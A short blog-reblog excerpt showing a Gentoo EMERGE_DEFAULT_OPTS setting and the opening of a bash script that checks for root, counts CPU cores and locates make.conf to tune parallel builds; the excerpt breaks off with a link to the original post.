  • EMERGE_DEFAULT_OPTS=”${EMERGE_DEFAULT_OPTS} -j8 –load-average=7.85
 #!/bin/bash die() { echo "$1" 1>&2 exit 1 } # check if running as root check_sudo() { if [[ $EUID -ne 0 ]]; then echo "This script must be run as root" 1>&2 exit 1 fi } # outputs number of CPU coress (with hyperthreading) count_cpu() { grep -c processor /proc/cpuinfo || die "Error getting number of cpu" } # get location of make.conf…

View original post 125 more words